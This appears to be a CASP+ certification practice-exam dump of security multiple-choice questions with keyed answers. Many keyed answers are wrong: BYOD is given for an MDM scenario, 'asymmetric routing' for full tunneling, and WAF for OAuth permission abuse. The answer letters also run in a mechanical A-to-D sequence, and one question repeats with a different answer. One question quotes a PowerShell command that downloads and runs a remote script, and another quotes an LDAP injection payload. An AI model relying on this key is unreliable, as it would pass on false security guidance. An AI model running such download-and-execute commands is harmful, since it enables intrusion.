CASP Plus B


SIMULATION You are a security analyst tasked with interpreting an Nmap scan output from the company's privileged network. The company's hardening guidelines indicate the following: 1. There should be one primary server or service per device. 2. Only default ports should be used. 3. Non-secure protocols should be disabled. INSTRUCTIONS Using the Nmap output, identify the devices on the network and their roles, and any open ports that should be closed. For each device found by Nmap, add a device entry to the Devices Discovered list, with the following information: 1. The IP address of the device 2. The primary server or service of the device (Note that each IP should be associated with one service/port only) 3. The protocol(s) that should be disabled based on the hardening guidelines (Note that multiple ports may need to be closed to comply with the hardening guidelines) If at any time you would like to bring back the initial state of the simulation, please click the Reset All button. A. See explanation below. B. Place Holder C. Place Holder D. Place Holder

Correct Answer: A Explanation/Reference: 10.1.45.65 SFTP Server, disable 8080; 10.1.45.66 Email Server, disable 415 and 443; 10.1.45.67 Web Server, disable 21 and 80; 10.1.45.68 UTM Appliance, disable 21

A recent data breach revealed that a company has a number of files containing customer data across its storage environment. These files are individualized for each employee and are used in tracking various customer orders, inquiries, and issues. The files are not encrypted and can be accessed by anyone. The senior management team would like to address these issues without interrupting existing processes. Which of the following should a security architect recommend? A. A DLP program to identify which files have customer data and delete them B. An ERP program to identify which processes need to be tracked C. A CMDB to report on systems that are not configured to security baselines D. A CRM application to consolidate the data and provision access based on the process and need

Correct Answer: A. A DLP program to identify which files have customer data and delete them Explanation/Reference: Reference: https://searchdatacenter.techtarget.com/definition/configuration-management-database#:~:text=A%20configuration%20management%20database%20(CMDB,the%20relationships%20between%20those%20components

An attacker infiltrated an electricity-generation site and disabled the safety instrumented system. Ransomware was also deployed on the engineering workstation. The environment has back-to-back firewalls separating the corporate and OT systems. Which of the following is the MOST likely security consequence of this attack? A. A turbine would overheat and cause physical harm. B. The engineers would need to go to the historian. C. The SCADA equipment could not be maintained. D. Data would be exfiltrated through the data diodes.

Correct Answer: A. A turbine would overheat and cause physical harm.

An organization's existing infrastructure includes site-to-site VPNs between datacenters. In the past year, a sophisticated attacker exploited a zero-day vulnerability on the VPN concentrator. Consequently, the Chief Information Security Officer (CISO) is making infrastructure changes to mitigate the risk of service loss should another zero-day exploit be used against the VPN solution. Which of the following designs would be BEST for the CISO to use? A. Adding a second redundant layer of alternate vendor VPN concentrators B. Using Base64 encoding within the existing site-to-site VPN connections C. Distributing security resources across VPN sites D. Implementing IDS services with each VPN concentrator E. Transitioning to a container-based architecture for site-based services

Correct Answer: A. Adding a second redundant layer of alternate vendor VPN concentrators Explanation/Reference: If one VPN concentrator goes down due to a zero-day threat, having a redundant VPN concentrator from a different vendor should keep you going.

Which of the following is required for an organization to meet the ISO 27018 standard? A. All PII must be encrypted. B. All network traffic must be inspected. C. GDPR equivalent standards must be met. D. COBIT equivalent standards must be met.

Correct Answer: A. All PII must be encrypted.

An organization is assessing the security posture of a new SaaS CRM system that handles sensitive PII and identity information, such as passport numbers. The SaaS CRM system does not meet the organization's current security standards. The assessment identifies the following: 1. There will be a $20,000 per day revenue loss for each day the system is delayed going into production. 2. The inherent risk is high. 3. The residual risk is low. 4. The solution will be rolled out to the contact center in a staged deployment. Which of the following risk-handling techniques will BEST meet the organization's requirements? A. Apply for a security exemption, as the risk is too high to accept. B. Transfer the risk to the SaaS CRM vendor, as the organization is using a cloud service. C. Accept the risk, as compensating controls have been implemented to manage the risk. D. Avoid the risk by accepting the shared responsibility model with the SaaS CRM provider.

Correct Answer: A. Apply for a security exemption, as the risk is too high to accept.

The Chief Information Officer (CIO) wants to implement enterprise mobility throughout the organization. The goal is to allow employees access to company resources. However, the CIO wants the ability to enforce configuration settings, manage data, and manage both company-owned and personal devices. Which of the following should the CIO implement to achieve this goal? A. BYOD B. CYOD C. COPE D. MDM

Correct Answer: A. BYOD

A vulnerability assessment endpoint generated a report of the latest findings. A security analyst needs to review the report and create a priority list of items that must be addressed. Which of the following should the analyst use to create the list quickly? A. Business impact rating B. CVE dates C. CVSS scores D. OVAL

Correct Answer: A. Business impact rating

A security engineer is hardening a company's multihomed SFTP server. When scanning a public-facing network interface, the engineer finds the following ports are open: 1. 22 2. 25 3. 110 4. 137 5. 138 6. 139 7. 445 Internal Windows clients are used to transfer files to the server to stage them for customer download as part of the company's distribution process. Which of the following would be the BEST solution to harden the system? A. Close ports 110, 138, and 139. Bind ports 22, 25, and 137 to only the internal interface. B. Close ports 25 and 110. Bind ports 137, 138, 139, and 445 to only the internal interface. C. Close ports 22 and 139. Bind ports 137, 138, and 445 to only the internal interface. D. Close ports 22, 137, and 138. Bind ports 110 and 445 to only the internal interface.

Correct Answer: A. Close ports 110, 138, and 139. Bind ports 22, 25, and 137 to only the internal interface.

A large telecommunications equipment manufacturer needs to evaluate the strengths of security controls in a new telephone network supporting first responders. Which of the following techniques would the company use to evaluate data confidentiality controls? A. Eavesdropping B. On-path C. Cryptanalysis D. Code signing E. RF sidelobe sniffing

Correct Answer: A. Eavesdropping

An organization's assessment of a third-party, non-critical vendor reveals that the vendor does not have cybersecurity insurance and IT staff turnover is high. The organization uses the vendor to move customer office equipment from one service location to another. The vendor acquires customer data and access to the business via an API. Given this information, which of the following is a noted risk? A. Feature delay due to extended software development cycles B. Financial liability from a vendor data breach C. Technical impact to the API configuration D. The possibility of the vendor's business ceasing operations

Correct Answer: A. Feature delay due to extended software development cycles Explanation/Reference: Reference: https://legal.thomsonreuters.com/en/insights/articles/data-breach-liability

A user experiences an HTTPS connection error when trying to access an Internet banking website from a corporate laptop. The user then opens a browser on a mobile phone and is able to access the same Internet banking website without issue. Which of the following security configurations is MOST likely the cause of the error? A. HSTS B. TLS 1.2 C. Certificate pinning D. Client authentication

Correct Answer: A. HSTS

A security architect was asked to modify an existing internal network design to accommodate the following requirements for RDP: 1. Enforce MFA for RDP. 2. Ensure RDP connections are only allowed with secure ciphers. The existing network is extremely complex and not well segmented. Because of these limitations, the company has requested that the connections not be restricted by network-level firewalls or ACLs. Which of the following should the security architect recommend to meet these requirements? A. Implement a reverse proxy for remote desktop with a secure cipher configuration enforced. B. Implement a bastion host with a secure cipher configuration enforced. C. Implement a remote desktop gateway server, enforce secure ciphers, and configure it to use OTP. D. Implement a GPO that enforces TLS cipher suites and limits remote desktop access to only VPN users.

Correct Answer: A. Implement a reverse proxy for remote desktop with a secure cipher configuration enforced.

A company just released a new video card. Due to limited supply and high demand, attackers are employing automated systems to purchase the device through the company's web store so they can resell it on the secondary market. The company's intended customers are frustrated. A security engineer suggests implementing a CAPTCHA system on the web store to help reduce the number of video cards purchased through automated systems. Which of the following now describes the level of risk? A. Inherent Low B. Mitigated C. Residual D. Transferred

Correct Answer: A. Inherent Low

An organization is researching the automation capabilities for systems within an OT network. A security analyst wants to assist with creating secure coding practices and would like to learn about the programming languages used on the PLCs. Which of the following programming languages is the MOST relevant for PLCs? A. Ladder logic B. Rust C. C D. Python E. Java

Correct Answer: A. Ladder logic

A forensic expert working on a fraud investigation for a US-based company collected a few disk images as evidence. Which of the following offers an authoritative decision about whether the evidence was obtained legally? A. Lawyers B. Court C. Upper management team D. Police

Correct Answer: A. Lawyers

A security engineer needs to implement a CASB to secure employee user web traffic. A key requirement is that relevant event data must be collected from existing on-premises infrastructure components and consumed by the CASB to expand traffic visibility. The solution must be highly resilient to network outages. Which of the following architectural components would BEST meet these requirements? A. Log collection B. Reverse proxy C. WAF D. API mode

Correct Answer: A. Log collection

A company is looking for a solution to hide data stored in databases. The solution must meet the following requirements: 1. Be efficient at protecting the production environment 2. Not require any change to the application 3. Act at the presentation layer Which of the following techniques should be used? A. Masking B. Tokenization C. Algorithmic D. Random substitution

Correct Answer: A. Masking

A security compliance requirement states that specific environments that handle sensitive data must be protected by need-to-know restrictions and can only connect to authorized endpoints. The requirement also states that a DLP solution within the environment must be used to control the data from leaving the environment. Which of the following should be implemented for privileged users so they can support the environment from their workstations while remaining compliant? A. NAC to control authorized endpoints B. FIM on the servers storing the data C. A jump box in the screened subnet D. A general VPN solution to the primary network

Correct Answer: A. NAC to control authorized endpoints Explanation/Reference: Network Access Control (NAC) is used to bolster network security by restricting the availability of network resources to managed endpoints that do not satisfy the compliance requirements of the organization.

Based on PCI DSS v3.4, one particular database field can store data, but the data must be unreadable. Which of the following data objects meets this requirement? A. PAN B. CVV2 C. Cardholder name D. Expiration date

Correct Answer: A. PAN

An organization requires a contractual document that includes: 1. An overview of what is covered 2. Goals and objectives 3. Performance metrics for each party 4. A review of how the agreement is managed by all parties Which of the following BEST describes this type of contractual document? A. SLA B. BAA C. NDA D. ISA

Correct Answer: A. SLA

Given the following log snippet from a web server: Which of the following BEST describes this type of attack? A. SQL injection B. Cross-site scripting C. Brute-force D. Cross-site request forgery

Correct Answer: A. SQL injection

A DevOps team has deployed databases, event-driven services, and an API gateway as a PaaS solution that will support a new billing system. Which of the following security responsibilities will the DevOps team need to perform? A. Securely configure the authentication mechanisms. B. Patch the infrastructure at the operating system. C. Execute port scanning against the services. D. Upgrade the service as part of life-cycle management.

Correct Answer: A. Securely configure the authentication mechanisms.

A security analyst is reviewing the following vulnerability assessment report: Which of the following should be patched FIRST to minimize attacks against Internet-facing hosts? A. Server1 B. Server2 C. Server3 D. Servers

Correct Answer: A. Server1

A small business would like to provide guests who are using mobile devices encrypted WPA3 access without first distributing PSKs or other credentials. Which of the following features will enable the business to meet this objective? A. Simultaneous Authentication of Equals B. Enhanced open C. Perfect forward secrecy D. Extensible Authentication Protocol

Correct Answer: A. Simultaneous Authentication of Equals

A help desk technician just informed the security department that a user downloaded a suspicious file from Internet Explorer last night. The user confirmed accessing all the files and folders before going home from work. The next morning, the user was no longer able to boot the system and was presented with a screen showing a phone number. The technician then tried to boot the computer using wake-on-LAN, but the system would not come up. Which of the following explains why the computer would not boot? A. The operating system was corrupted. B. SELinux was in enforced status. C. A secure boot violation occurred. D. The disk was encrypted.

Correct Answer: A. The operating system was corrupted.

A company based in the United States holds insurance details of EU citizens. Which of the following must be adhered to when processing EU citizens' personal, private, and confidential data? A. The principle of lawful, fair, and transparent processing B. The right to be forgotten principle of personal data erasure requests C. The non-repudiation and deniability principle D. The principle of encryption, obfuscation, and data masking

Correct Answer: A. The principle of lawful, fair, and transparent processing

Which of the following protocols is a low-power, low-data-rate protocol that allows for the creation of PAN networks? A. Zigbee B. CAN C. DNP3 D. Modbus

Correct Answer: A. Zigbee Explanation/Reference: Reference: https://urgentcomm.com/2007/11/01/connecting-on-a-personal-level/

A security team received a regulatory notice asking for information regarding collusion and pricing from staff members who are no longer with the organization. The legal department provided the security team with a list of search terms to investigate. This is an example of: A. due intelligence B. e-discovery. C. due care. D. legal hold.

Correct Answer: A. due intelligence Explanation/Reference: Reference: https://www.ansarada.com/due-diligence/hr

An auditor needs to scan documents at rest for sensitive text. These documents contain both text and images. Which of the following software functionalities must be enabled in the DLP solution for the auditor to be able to fully read these documents? (Select TWO). A. Document interpolation B. Regular expression pattern matching C. Optical character recognition functionality D. Baseline image matching E. Advanced rasterization F. Watermarking

Correct Answer: AC Document interpolation Optical character recognition functionality

A healthcare system recently suffered from a ransomware incident. As a result, the board of directors decided to hire a security consultant to improve existing network security. The security consultant found that the healthcare network was completely flat, had no privileged access limits, and had open RDP access to servers with personal health information. As the consultant builds the remediation plan, which of the following solutions would BEST solve these challenges? (Select THREE). A. SD-WAN B. PAM C. Remote access VPN D. MFA E. Network segmentation F. BGP G. NAC

Correct Answer: ACE SD-WAN Remote access VPN Network segmentation

A security architect is reviewing the following proposed corporate firewall architecture and configuration: Both firewalls are stateful and provide Layer 7 filtering and routing. The company has the following requirements: 1. Web servers must receive all updates via HTTP/S from the corporate network. 2. Web servers should not initiate communication with the Internet. 3. Web servers should only connect to preapproved corporate database servers. 4. Employees' computing devices should only connect to web services over ports 80 and 443. Which of the following should the architect recommend to ensure all requirements are met in the MOST secure manner? (Choose two.) A. Add the following to Firewall_A: 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0/0 TCP 80,443 B. Add the following to Firewall_A: 15 PERMIT FROM 192.168.1.0/24 TO 0.0.0.0 TCP 80,443 C. Add the following to Firewall_A: 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0/0 TCP/UDP 0-65535 D. Add the following to Firewall_B: 15 PERMIT FROM 0.0.0.0/0 TO 10.0.0.0/16 TCP/UDP 0-65535 E. Add the following to Firewall_B: 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0 TCP/UDP 0-65535 F. Add the following to Firewall_B: 15 PERMIT FROM 192.168.1.0/24 TO 10.0.2.10/32 TCP 80,443

Correct Answer: AD Add the following to Firewall_A: 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0/0 TCP 80,443 Add the following to Firewall_B: 15 PERMIT FROM 0.0.0.0/0 TO 10.0.0.0/16 TCP/UDP 0-65535

An organization developed a social media application that is used by customers in multiple remote geographic locations around the world. The organization's headquarters and only datacenter are located in New York City. The Chief Information Security Officer wants to ensure the following requirements are met for the social media application: 1. Low latency for all mobile users to improve the users' experience 2. SSL offloading to improve web server performance 3. Protection against DoS and DDoS attacks 4. High availability Which of the following should the organization implement to BEST ensure all requirements are met? A. A cache server farm in its datacenter B. A load-balanced group of reverse proxy servers with SSL acceleration C. A CDN with the origin set to its datacenter D. Dual gigabit-speed Internet connections with managed DDoS prevention

Correct Answer: B. A load-balanced group of reverse proxy servers with SSL acceleration

A networking team was asked to provide secure remote access to all company employees. The team decided to use client-to-site VPN as a solution. During a discussion, the Chief Information Security Officer raised a security concern and asked the networking team to route the Internet traffic of remote users through the main office infrastructure. Doing this would prevent remote users from accessing the Internet through their local networks while connected to the VPN. Which of the following solutions does this describe? A. Full tunneling B. Asymmetric routing C. SSH tunneling D. Split tunneling

Correct Answer: B. Asymmetric routing

Which of the following is the BEST disaster recovery solution when resources are running in a cloud environment? A. Remote provider BCDR B. Cloud provider BCDR C. Alternative provider BCDR D. Primary provider BCDR

Correct Answer: B. Cloud provider BCDR

A user from the sales department opened a suspicious file attachment. The sales department then contacted the SOC to investigate a number of unresponsive systems, and the team successfully identified the file and the origin of the attack. Which of the following is the NEXT step of the incident response plan? A. Remediation B. Containment C. Response D. Recovery

Correct Answer: B. Containment Explanation/Reference: Reference: https://www.sciencedirect.com/topics/computer-science/containment-strategy

A penetration tester obtained root access on a Windows server and, according to the rules of engagement, is permitted to perform post-exploitation for persistence. Which of the following techniques would BEST support this? A. Configuring systemd services to run automatically at startup B. Creating a backdoor C. Exploiting an arbitrary code execution exploit D. Moving laterally to a more authoritative server/service

Correct Answer: B. Creating a backdoor

Technicians have determined that the current server hardware is outdated, so they have decided to throw it out. Prior to disposal, which of the following is the BEST method to use to ensure no data remnants can be recovered? A. Drive wiping B. Degaussing C. Purging D. Physical destruction

Correct Answer: B. Degaussing Explanation/Reference: Reference: https://securis.com/data-destruction/degaussing-as-a-service/

An attack team performed a penetration test on a new smart card system. The team demonstrated that by subjecting the smart card to high temperatures, the secret key could be revealed. Which of the following side-channel attacks did the team use? A. Differential power analysis B. Differential fault analysis C. Differential temperature analysis D. Differential timing analysis

Correct Answer: B. Differential fault analysis Explanation/Reference: "Differential fault analysis (DFA) is a type of active side-channel attack in the field of cryptography, specifically cryptanalysis. The principle is to induce faults--unexpected environmental conditions--into cryptographic operations, to reveal their internal states." Reference: https://www.hitachi-hightech.com/global/products/science/tech/ana/thermal/descriptions/dta.html

Which of the following is the MOST important cloud-specific risk from the CSP's viewpoint? A. Isolation control failure B. Management plane breach C. Insecure data deletion D. Resource exhaustion

Correct Answer: B. Management plane breach

A company's Chief Information Security Officer is concerned that the company's proposed move to the cloud could lead to a lack of visibility into network traffic flow logs within the VPC. Which of the following compensating controls would be BEST to implement in this situation? A. EDR B. SIEM C. HIDS D. UEBA

Correct Answer: B. SIEM Explanation/Reference: Reference: https://runpanther.io/cyber-explained/cloud-based-siem-explained/

A security engineer is reviewing a record of events after a recent data breach incident that involved the following: 1. A hacker conducted reconnaissance and developed a footprint of the company's Internet-facing web application assets. 2. A vulnerability in a third-party library was exploited by the hacker, resulting in the compromise of a local account. 3. The hacker took advantage of the account's excessive privileges to access a data store and exfiltrate the data without detection. Which of the following is the BEST solution to help prevent this type of attack from being successful in the future? A. Dynamic analysis B. Secure web gateway C. Software composition analysis D. User behavior analysis E. Web application firewall

Correct Answer: B. Secure web gateway

A pharmaceutical company recently experienced a security breach within its customer-facing web portal. The attackers performed a SQL injection attack and exported tables from the company's managed database, exposing customer information. The company hosts the application with a CSP utilizing the IaaS model. Which of the following parties is ultimately responsible for the breach? A. The pharmaceutical company B. The cloud software provider C. The web portal software vendor D. The database software vendor

Correct Answer: B. The cloud software provider

Which of the following represents the MOST significant benefit of implementing a passwordless authentication solution? A. Biometric authenticators are immutable. B. The likelihood of account compromise is reduced. C. Zero trust is achieved. D. Privacy risks are minimized.

Correct Answer: B. The likelihood of account compromise is reduced. Explanation/Reference: Reference: https://cloudworks.no/en/5-benefits-of-passwordless-authentication/

Leveraging cryptographic solutions to protect data that is in use ensures the data is encrypted: A. when it is passed across a local network. B. in memory during processing C. when it is written to a system's solid-state drive. D. by an enterprise hardware security module.

Correct Answer: B. in memory during processing

A company invested a total of $10 million for a new storage solution installed across five on-site datacenters. Fifty percent of the cost of this investment was for solid-state storage. Due to the high rate of wear on this storage, the company is estimating that 5% will need to be replaced per year. Which of the following is the ALE due to storage replacement? A. $50,000 B. $125,000 C. $250,000 D. $500,000 E. $51,000,000

Correct Answer: C. $250,000

A company security engineer arrives at work to face the following scenario: 1) Website defacement 2) Calls from the company president indicating the website needs to be fixed immediately because it is damaging the brand 3) A job offer from the company's competitor 4) A security analyst's investigative report, based on logs from the past six months, describing how lateral movement across the network from various IP addresses originating from a foreign adversary country resulted in exfiltrated data Which of the following threat actors is MOST likely involved? A. Organized crime B. Script kiddie C. APT/nation-state D. Competitor

Correct Answer: C. APT/nation-state

A security administrator configured the account policies per security implementation guidelines. However, the accounts still appear to be susceptible to brute-force attacks. The following settings meet the existing compliance guidelines: 1. Must have a minimum of 15 characters 2. Must use one number 3. Must use one capital letter 4. Must not be one of the last 12 passwords used Which of the following policies should be added to provide additional security? A. Shared accounts B. Password complexity C. Account lockout D. Password history E. Time-based logins

Correct Answer: C. Account lockout Explanation/Reference: Reference: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/account-lockout-threshold

A cybersecurity analyst discovered a private key that could have been exposed. Which of the following is the BEST way for the analyst to determine if the key has been compromised? A. HSTS B. CRL C. CSRs D. OCSP

Correct Answer: C. CSRs Explanation/Reference: Reference: https://www.ssl.com/faqs/compromised-private-keys/

A local government that is investigating a data exfiltration claim was asked to review the fingerprint of the malicious user's actions. An investigator took a forensic image of the VM and downloaded the image to a secured USB drive to share with the government. Which of the following should be taken into consideration during the process of releasing the drive to the government? A. Encryption in transit B. Legal issues C. Chain of custody D. Order of volatility E. Key exchange

Correct Answer: C. Chain of custody

A software company is developing an application in which data must be encrypted with a cipher that requires the following: 1. Initialization vector 2. Low latency 3. Suitable for streaming Which of the following ciphers should the company use? A. Cipher feedback B. Cipher block chaining message authentication code C. Cipher block chaining D. Electronic codebook

Correct Answer: C. Cipher block chaining Explanation/Reference: Reference: https://www.sciencedirect.com/topics/computer-science/symmetric-cipher

A business wants to migrate its workloads from an exclusively on-premises IT infrastructure to the cloud but cannot implement all the required controls. Which of the following BEST describes the risk associated with this implementation? A. Loss of governance B. Vendor lockout C. Compliance risk D. Vendor lock-in

Correct Answer: C. Compliance risk

A company wants to quantify and communicate the effectiveness of its security controls but must establish measures. Which of the following is MOST likely to be included in an effective assessment roadmap for these controls? A. Create a change management process. B. Establish key performance indicators. C. Create an integrated master schedule. D. Develop a communication plan. E. Perform a security control assessment.

Correct Answer: C. Create an integrated master schedule

An organization requires a legacy system to incorporate reference data into a new system. The organization anticipates the legacy system will remain in operation for the next 18 to 24 months. Additionally, the legacy system has multiple critical vulnerabilities with no patches available to resolve them. Which of the following is the BEST design option to optimize security? A. Limit access to the system using a jump box. B. Place the new system and legacy system on separate VLANs C. Deploy the legacy application on an air-gapped system. D. Implement MFA to access the legacy system.

Correct Answer: C. Deploy the legacy application on an air-gapped system.

An organization is developing a disaster recovery plan that requires data to be backed up and available at a moment's notice. Which of the following should the organization consider FIRST to address this requirement? A. Implement a change management plan to ensure systems are using the appropriate versions. B. Hire additional on-call staff to be deployed if an event occurs. C. Design an appropriate warm site for business continuity. D. Identify critical business processes and determine associated software and hardware requirements.

Correct Answer: C. Design an appropriate warm site for business continuity. Explanation/Reference: Reference: https://searchdisasterrecovery.techtarget.com/definition/warm-site

A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file: powershell "IEX(New-Object Net.WebClient).DownloadString('https://content.comptia.org/casp/whois.ps1');whois" Which of the following security controls would have alerted and prevented the next phase of the attack? A. Antivirus and UEBA B. Reverse proxy and sandbox C. EDR and application approved list D. Forward proxy and MFA

Correct Answer: C. EDR and application approved list Explanation/Reference: An EDR solution combined with an application allow list should protect against this attack.

A security analyst detected a malicious PowerShell attack on a single server. The malware used the Invoke-Expression function to execute an external malicious script. The security analyst scanned the disk with an antivirus application and did not find any IOCs. The security analyst now needs to deploy a protection solution against this type of malware. Which of the following BEST describes the type of malware the solution should protect against? A. Worm B. Logic bomb C. Fileless D. Rootkit

Correct Answer: C. Fileless Explanation/Reference: Reference: https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/tracking-detecting-and-thwarting-powershell-based-malware-and-attacks

A company's Chief Information Officer wants to implement IDS software onto the current system's architecture to provide an additional layer of security. The software must be able to monitor system activity, provide information on attempted attacks, and provide analysis of malicious activities to determine the processes or users involved. Which of the following would provide this information? A. HIPS B. UEBA C. HIDS D. NIDS

Correct Answer: C. HIDS Explanation/Reference: Reference: https://www.sciencedirect.com/topics/computer-science/host-based-intrusion-detection-systems

A Chief Information Security Officer (CISO) has launched an initiative to create a robust BCP/DR plan for the entire company. As part of the initiative, the security team must gather data supporting the operational importance of the applications used by the business and determine the order in which the applications must be brought back online. Which of the following should be the FIRST step taken by the team? A. Perform a review of all policies and procedures related to BCP and DR and create an educational module that can be assigned to all employees to provide training on BCP/DR events. B. Create an SLA for each application that states when the application will come back online and distribute this information to the business units. C. Have each business unit conduct a BIA and categorize the applications according to the cumulative data gathered. D. Implement replication of all servers and application data to backup datacenters that are geographically separated from the central datacenter and release an updated BPA to all clients.

Correct Answer: C. Have each business unit conduct a BIA and categorize the applications according to the cumulative data gathered.

As part of the customer registration process to access a new bank account, customers are required to upload a number of documents, including their passports and driver's licenses. The process also requires customers to take a current photo of themselves to be compared against provided documentation. Which of the following BEST describes this process? A. Deepfake B. Know your customer C. Identity proofing D. Passwordless

Correct Answer: C. Identity proofing Explanation/Reference: Reference: https://auth0.com/blog/what-is-identity-proofing-and-why-does-it-matter/

A security analyst discovered that the company's WAF was not properly configured. The main web server was breached, and the following payload was found in one of the malicious requests: (&(objectClass=*)(objectClass=*))(&(objectClass=void)(type=admin)) Which of the following would BEST mitigate this vulnerability? A. Network intrusion prevention B. Data encoding C. Input validation D. CAPTCHA

Correct Answer: C. Input validation Explanation/Reference: Reference: https://book.hacktricks.xyz/pentesting-web/ldap-injection

A security architect for a large, multinational manufacturer needs to design and implement a security solution to monitor traffic. When designing the solution, which of the following threats should the security architect focus on to prevent attacks against the network? A. Packets that are the wrong size or length B. Use of any non-DNP3 communication on a DNP3 port C. Multiple solicited responses over time D. Application of an unsupported encryption algorithm

Correct Answer: C. Multiple solicited responses over time

A developer wants to develop a secure external-facing web application. The developer is looking for an online community that produces tools, methodologies, articles, and documentation in the field of web-application security. Which of the following is the BEST option? A. ICANN B. PCI DSS C. OWASP D. CSA E. NIST

Correct Answer: C. OWASP

As part of its risk strategy, a company is considering buying insurance for cybersecurity incidents. Which of the following BEST describes this kind of risk response? A. Risk rejection B. Risk mitigation C. Risk transference D. Risk avoidance

Correct Answer: C. Risk transference Explanation/Reference: Reference: https://hbr.org/2021/01/cybersecurity-insurance-has-a-big-problem

A company wants to improve its active protection capabilities against unknown and zero-day malware. Which of the following is the MOST secure solution? A. NIDS B. Application allow list C. Sandbox detonation D. Endpoint log collection E. HIDS

Correct Answer: C. Sandbox detonation

The Chief Information Security Officer of a startup company has asked a security engineer to implement a software security program in an environment that previously had little oversight. Which of the following testing methods would be BEST for the engineer to utilize in this situation? A. Software composition analysis B. Code obfuscation C. Static analysis D. Dynamic analysis

Correct Answer: C. Static analysis

A company is adopting a new artificial-intelligence-based analytics SaaS solution. This is the company's first attempt at using a SaaS solution, and a security architect has been asked to determine any future risks. Which of the following would be the GREATEST risk in adopting this solution? A. The inability to assign access controls to comply with company policy B. The inability to require the service provider process data in a specific country C. The inability to obtain company data when migrating to another service D. The inability to conduct security assessments against a service provider

Correct Answer: C. The inability to obtain company data when migrating to another service

A recent data breach stemmed from unauthorized access to an employee's company account with a cloud-based productivity suite. The attacker exploited excessive permissions granted to a third-party OAuth application to collect sensitive information. Which of the following BEST mitigates inappropriate access and permissions issues? A. SIEM B. CASB C. WAF D. SOAR

Correct Answer: C. WAF Explanation/Reference: Reference: https://www.cloudflare.com/en-gb/learning/ddos/glossary/web-application-firewall-waf/

A security consultant needs to set up wireless security for a small office that does not have Active Directory. Despite the lack of central account management, the office manager wants to ensure a high level of defense to prevent brute-force attacks against wireless authentication. Which of the following technologies would BEST meet this need? A. Faraday cage B. WPA2 PSK C. WPA3 SAE D. WEP 128 bit

Correct Answer: C. WPA3 SAE Explanation/Reference: WPA3 SAE prevents brute-force attacks. Reference: https://support.enplug.com/hc/en-us/articles/205160175-Setting-your-WiFi-encryption-as-WPA2-PSK

A vulnerability scanner detected an obsolete version of an open-source file-sharing application on one of a company's Linux servers. While the software version is no longer supported by the OSS community, the company's Linux vendor backported fixes, applied them for all current vulnerabilities, and agrees to support the software in the future. Based on this agreement, this finding is BEST categorized as a: A. true positive. B. true negative. C. false positive. D. false negative.

Correct Answer: C. false positive.

A forensic investigator would use the foremost command for: A. cloning disks. B. analyzing network-captured packets. C. recovering lost files. D. extracting features such as email addresses.

Correct Answer: C. recovering lost files. Explanation/Reference: Reference: https://www.networkworld.com/article/2333727/foremost--a-linux-computer-forensics-tool.html

A review of the past year's attack patterns shows that attackers stopped reconnaissance after finding a susceptible system to compromise. The company would like to find a way to use this information to protect the environment while still gaining valuable attack information. Which of the following would be BEST for the company to implement? A. A WAF B. An IDS C. A SIEM D. A honeypot

Correct Answer: D. A honeypot Explanation/Reference: Reference: https://www.kaspersky.com/resource-center/threats/what-is-a-honeypot

A systems administrator is preparing to run a vulnerability scan on a set of information systems in the organization. The systems administrator wants to ensure that the targeted systems produce accurate information especially regarding configuration settings. Which of the following scan types will provide the systems administrator with the MOST accurate information? A. A passive, credentialed scan B. A passive, non-credentialed scan C. An active, non-credentialed scan D. An active, credentialed scan

Correct Answer: D. An active, credentialed scan

A company's product site recently had failed API calls, resulting in customers being unable to check out and purchase products. This type of failure could lead to the loss of customers and damage to the company's reputation in the market. Which of the following should the company implement to address the risk of system unavailability? A. User and entity behavior analytics B. Redundant reporting systems C. A self-healing system D. Application controls

Correct Answer: D. Application controls

An organization is assessing the security posture of a new SaaS CRM system that handles sensitive PII and identity information, such as passport numbers. The SaaS CRM system does not meet the organization's current security standards. The assessment identifies the following: 1) There will be a 520,000 per day revenue loss for each day the system is delayed going into production. 2) The inherent risk is high. 3) The residual risk is low. 4) There will be a staged deployment to the solution rollout to the contact center. Which of the following risk-handling techniques will BEST meet the organization's requirements? A. Apply for a security exemption, as the risk is too high to accept. B. Transfer the risk to the SaaS CRM vendor, as the organization is using a cloud service. C. Accept the risk, as compensating controls have been implemented to manage the risk. D. Avoid the risk by accepting the shared responsibility model with the SaaS CRM provider.

Correct Answer: D. Avoid the risk by accepting the shared responsibility model with the SaaS CRM provider.

Which of the following technologies allows CSPs to add encryption across multiple data storages? A. Symmetric encryption B. Homomorphic encryption C. Data dispersion D. Bit splitting

Correct Answer: D. Bit splitting Explanation/Reference: Reference: https://www.hhs.gov/sites/default/files/nist800111.pdf

An organization that provides a SaaS solution recently experienced an incident involving customer data loss. The system has a level of self-healing that includes monitoring performance and available resources. When the system detects an issue, the self-healing process is supposed to restart parts of the software. During the incident, when the self-healing system attempted to restart the services, available disk space on the data drive to restart all the services was inadequate. The self-healing system did not detect that some services did not fully restart and declared the system as fully operational. Which of the following BEST describes the reason why the silent failure occurred? A. The system logs rotated prematurely. B. The disk utilization alarms are higher than what the service restarts require. C. The number of nodes in the self-healing cluster was healthy. D. Conditional checks prior to the service restart succeeded.

Correct Answer: D. Conditional checks prior to the service restart succeeded.

A bank is working with a security architect to find the BEST solution to detect database management system compromises. The solution should meet the following requirements: 1. Work at the application layer 2. Send alerts on attacks from both privileged and malicious users 3. Have a very low false positive Which of the following should the architect recommend? A. FIM B. WAF C. NIPS D. DAM E. UTM

Correct Answer: D. DAM

A software development company makes its software version available to customers from a web portal. On several occasions, hackers were able to access the software repository to change the package that is automatically published on the website. Which of the following would be the BEST technique to ensure the software the users download is the official software released by the company? A. Distribute the software via a third-party repository. B. Close the web repository and deliver the software via email. C. Email the software link to all customers. D. Display the SHA checksum on the website.

Correct Answer: D. Display the SHA checksum on the website.

A Chief Information Officer (CIO) wants to implement a cloud solution that will satisfy the following requirements: 1. Support all phases of the SDLC. 2. Use tailored website portal software. 3. Allow the company to build and use its own gateway software. 4. Utilize its own data management platform. 5. Continue using agent-based security tools. Which of the following cloud-computing models should the CIO implement? A. SaaS B. PaaS C. MaaS D. IaaS

Correct Answer: D. IaaS Explanation/Reference: Reference: https://www.bmc.com/blogs/saas-vs-paas-vs-iaas-whats-the-difference-and-how-to-choose/

